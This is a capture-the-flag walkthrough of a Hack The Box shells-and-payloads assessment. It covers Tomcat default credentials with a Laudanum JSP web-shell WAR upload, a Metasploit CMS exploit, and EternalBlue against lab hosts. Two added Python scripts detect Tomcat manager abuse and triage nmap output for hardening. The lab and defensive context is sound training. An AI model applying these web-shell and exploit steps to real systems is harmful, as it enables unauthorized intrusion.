
# Live assessment

## HTB: Shells & Payload Skill Assessment

Objective: Validate the recon data, research the exposed services, and compromise three internal targets, with every attack originating from the provided Foothold PC.

Network scope: `172.16.0.0/23`

### Phase 0: Infrastructure Preparation

Since all attacks must originate from the Foothold PC, we first need to establish a stable connection and set up our workspace.

1\. Initialize RDP Connection

```bash
xfreerdp /v:<Foothold_PC_IP> /u:htb-student /p:HTB_@cademy_stdnt!
```

2\. Establish SSH (for better terminal stability). Run this inside the RDP session to start the SSH service:

```bash
systemctl start ssh
```

Then connect from your local host:

```bash
ssh htb-student@<Foothold_PC_IP>
```

3\. Prepare Workspace

```bash
mkdir offsec
cd offsec
```

### Target 1: Windows Server (Tomcat)

IP: `172.16.1.11` | Vector: Apache Tomcat WAR Upload

#### Enumeration

First, we run Nmap to identify services and the hostname.

```bash
nmap -oN host1_initial_enum 172.16.1.11
nmap -oN host1_services_enum -sC -sV -p 80,135,139,445,515 172.16.1.11
```

> Results: Hostname is `shells-winsrvr`. Port 8080 is running Apache Tomcat/10.0.11.

#### Exploitation

Navigating to `http://172.16.1.11:8080/manager/html` prompts for credentials. A quick OSINT search on GitHub for Tomcat default credentials turned up a working pair:

* Username: `tomcat`
* Password: `Tomcatadm`

Crafting the Payload (Laudanum): We prepare a JSP web shell using the Laudanum framework.

```bash
cd /usr/share/laudanum/jsp/warfiles
sudo nano cmd.jsp
```

*Note: Edit the `allowedIPs` array in `cmd.jsp` to include the Foothold PC's internal IP (`172.16.x.x`) to bypass the local-only restriction.*

Compiling the WAR File:

```bash
sudo apt-get install default-jdk
sudo ./makewar.sh
```

Deployment & Execution: Transfer the compiled `.war` file to the foothold:

```bash
scp ./cmd.war htb-student@<Foothold_PC_IP>:/home/htb-student/
```

1. Upload `cmd.war` via the Tomcat Manager GUI.
2. The WAR unpacks like a ZIP file. Access the shell at: `http://172.16.1.11:8080/cmd/warfiles/cmd.jsp`

> Flag / Answer: Exploring the C:\ drive reveals the target folder is `dev-share`.
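The whole Target 1 chain leaves a clear trail in Tomcat's own access log: an authenticated request to `/manager/html`, a `POST` to the HTML manager's upload endpoint, and then requests to a `.jsp` inside the newly deployed context carrying a command parameter. The script below is an added example for this write-up (not part of the assessment, of Laudanum or of Tomcat) that parses lines in Tomcat's default `AccessLogValve` pattern (`%h %l %u %t "%r" %s %b`) and raises findings for that sequence. The log lines are constructed to mirror the steps above; the `/manager/text/deploy` path it also watches is the text manager's deploy endpoint.

```python
"""Detect Tomcat Manager WAR deployments and follow-on web-shell traffic in
Tomcat access logs written with the default AccessLogValve pattern
(%h %l %u %t "%r" %s %b).

Added example for this write-up; it is not part of the assessment, of
Laudanum or of Tomcat. The log lines are constructed to mirror the steps above.
"""
import ipaddress
import re

# One regex for the "common" access-log pattern Tomcat ships with.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# /manager/html/upload is the HTML manager's deploy endpoint; the text
# manager deploys with PUT /manager/text/deploy. Both are the channels a
# WAR-upload compromise goes through.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

# Constructed sample: failed then successful manager login, a WAR upload,
# then requests to a JSP inside the new context carrying a cmd= parameter.
SAMPLE_LOG = """\
172.16.0.20 - - [14/Mar/2024:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
172.16.0.20 - tomcat [14/Mar/2024:10:01:09 +0000] "GET /manager/html HTTP/1.1" 200 17234
172.16.0.20 - tomcat [14/Mar/2024:10:01:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCDEF HTTP/1.1" 200 17501
172.16.0.20 - - [14/Mar/2024:10:02:05 +0000] "GET /cmd/warfiles/cmd.jsp HTTP/1.1" 200 812
172.16.0.20 - - [14/Mar/2024:10:02:31 +0000] "GET /cmd/warfiles/cmd.jsp?cmd=whoami HTTP/1.1" 200 933
10.10.5.7 - - [14/Mar/2024:10:03:00 +0000] "GET /index.jsp HTTP/1.1" 200 1190
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_remote(src):
    """True for any source that is not loopback (the manager app is loopback-only by default)."""
    try:
        return not ipaddress.ip_address(src).is_loopback
    except ValueError:
        return True  # hostnames in %h are treated as remote


def analyse(log_text):
    """Scan a log and return findings as (severity, source, message) tuples."""
    findings = []
    deployers = set()  # sources that have pushed a WAR through the manager
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, path, method, status = rec["src"], rec["path"], rec["method"], rec["status"]
        base_path = path.split("?", 1)[0]

        # 1. Successful use of the manager app from a non-loopback address.
        if base_path.startswith("/manager/") and status == "200" and is_remote(src):
            findings.append(("medium", src, f"manager app used remotely as user {rec['user']}"))

        # 2. A deployment through either manager interface.
        if method in ("POST", "PUT") and base_path.startswith(DEPLOY_PATHS):
            deployers.add(src)
            findings.append(("high", src, "WAR deployed through the manager app"))

        # 3. A JSP in the new context driven with a command-style parameter
        #    by the same source that deployed it: the web-shell pattern.
        if src in deployers and base_path.lower().endswith(".jsp") and "cmd=" in path:
            findings.append(("critical", src, f"command-style request to deployed JSP: {path}"))
    return findings


if __name__ == "__main__":
    for sev, src, msg in analyse(SAMPLE_LOG):
        print(f"[{sev:8}] {src:15} {msg}")
```

On the constructed sample this yields a medium finding for each successful manager request, a high finding for the upload, and a critical one for the `cmd=` request, all from the same source. The correlation on the deploying source is what separates a normal administrator deploy from the pattern in this assessment; the `allowedIPs` edit in `cmd.jsp` does nothing to hide any of it from the server-side log.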

### Target 2: Ubuntu Server (Blog)

IP: `172.16.1.12` | Vector: Vulnerable Web Application / Metasploit

#### Enumeration

Checking `/etc/hosts` on the Foothold PC reveals the IP for `blog.inlanefreight.local` is `172.16.1.12`.

```bash
nmap -oN host2_services_enum -sC -sV -p 80,22 172.16.1.12
```

> Results: OS is Ubuntu. Web server is running a CMS vulnerable to Metasploit module `50064.rb`.

#### Exploitation

Launch Metasploit and configure the specific exploit module.

```bash
msfconsole 
use 50064.rb
```

Configure Payload Options:

```bash
set rhost 172.16.1.12
set rport 80
set username admin
set password admin123!@#
set vhost blog.inlanefreight.local
exploit
```

> Note: The script executes successfully and reveals the payload uses PHP.

Retrieving the Flag: Drop into the system shell from meterpreter and read the flag.

```bash
shell
cat /customscripts/flag.txt
```

### Target 3: Windows Server (EternalBlue)

IP: `172.16.1.13` | Vector: MS17-010 (SMB)

#### Enumeration

```bash
nmap -oN host3_initial_enum 172.16.1.13
nmap -oN host3_services_enum -sC -sV -p 80,135,139,445 172.16.1.13
```

> Results: Hostname is `SHELLS-WINBLUE`. The server is running vulnerable SMB services.
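Each target's enumeration above is saved with `-oN`, which is nmap's human-readable "normal" output. The script below is an added example for this write-up (not part of the assessment or of nmap) that reads such files for all three targets at once and turns every open port covered by a hardening policy into a worklist entry, so the same scans that drive the attack drive the remediation. The scan text is constructed in nmap's normal-output format with the ports the write-up reports for `172.16.1.11` and `172.16.1.13`; the `POLICY` table and its actions are assumptions about what a server segment should expose.

```python
"""Turn the nmap -oN files produced during enumeration into a hardening
worklist: each open port that matches a policy entry becomes a finding.

Added example for this write-up; it is not part of the assessment or of nmap.
The scan text below is constructed in nmap's normal-output format with the
ports the write-up reports for 172.16.1.11 and 172.16.1.13.
"""
import re
from dataclasses import dataclass

HOST_RE = re.compile(r'^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?')
PORT_RE = re.compile(
    r'^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$'
)

# Policy for a server segment (assumed): what exposure of each port should trigger.
POLICY = {
    135: "MS-RPC endpoint mapper reachable: restrict to management hosts",
    139: "NetBIOS session service reachable: disable unless required",
    445: "SMB reachable: verify MS17-010 patch level, disable SMBv1, firewall 445 from user segments",
    515: "LPD printer service reachable: legacy protocol, disable or firewall",
    8080: "Tomcat reachable: keep /manager loopback-only and remove default manager credentials",
}

# Constructed sample: two normal-output reports concatenated as if `cat host*_services_enum`.
SAMPLE_SCAN = """\
# Nmap 7.94 scan initiated Thu Mar 14 09:58:11 2024 as: nmap -oN host1_services_enum -sC -sV -p 80,135,139,445,515,8080 172.16.1.11
Nmap scan report for 172.16.1.11
Host is up (0.0011s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds
515/tcp  open  printer
8080/tcp open  http         Apache Tomcat 10.0.11
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# Nmap 7.94 scan initiated Thu Mar 14 10:04:37 2024 as: nmap -oN host3_services_enum -sC -sV -p 80,135,139,445 172.16.1.13
Nmap scan report for 172.16.1.13
Host is up (0.0013s latency).

PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""


@dataclass
class Finding:
    host: str
    port: int
    service: str
    version: str
    action: str


def parse_hosts(text):
    """Yield (host, [(port, proto, state, service, version), ...]) per scan report."""
    host, ports = None, []
    for line in text.splitlines():
        h = HOST_RE.match(line)
        if h:
            if host is not None:
                yield host, ports
            # Prefer the IP in parentheses when nmap resolved a hostname.
            host, ports = h.group("ip") or h.group("name"), []
            continue
        p = PORT_RE.match(line)
        if p and host is not None:
            ports.append((int(p.group("port")), p.group("proto"), p.group("state"),
                          p.group("service"), p.group("version").strip()))
    if host is not None:
        yield host, ports


def triage(text, policy=POLICY):
    """Map every open TCP port covered by the policy to a Finding."""
    findings = []
    for host, ports in parse_hosts(text):
        for port, proto, state, service, version in ports:
            if proto == "tcp" and state == "open" and port in policy:
                findings.append(Finding(host, port, service, version, policy[port]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_SCAN):
        print(f"{f.host:12} {f.port:5} {f.service:13} {f.version or '-':40} {f.action}")
```

Run against the real `host*_services_enum` files by reading them into `triage()`; the parser only needs the `Nmap scan report for` header and the `PORT STATE SERVICE VERSION` rows, so `-sC` script output between rows is ignored. Port 80 is deliberately outside the policy here, which is why the IIS entries produce no finding while SMB and Tomcat do.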

#### Exploitation

While an IIS `upload.aspx` vector exists, grabbing the flag from the Administrator's desktop requires `NT AUTHORITY\SYSTEM` privileges. We pivot directly to EternalBlue for immediate RCE.

```bash
msfconsole
search eternalblue
```

*Select the Remote Command Execution module (usually option 2 in the search results).*

Configure Payload Options:

```bash
set rhost 172.16.1.13
set rport 445
set command type "C:\Users\Administrator\Desktop\Skills-flag.txt"
exploit
```

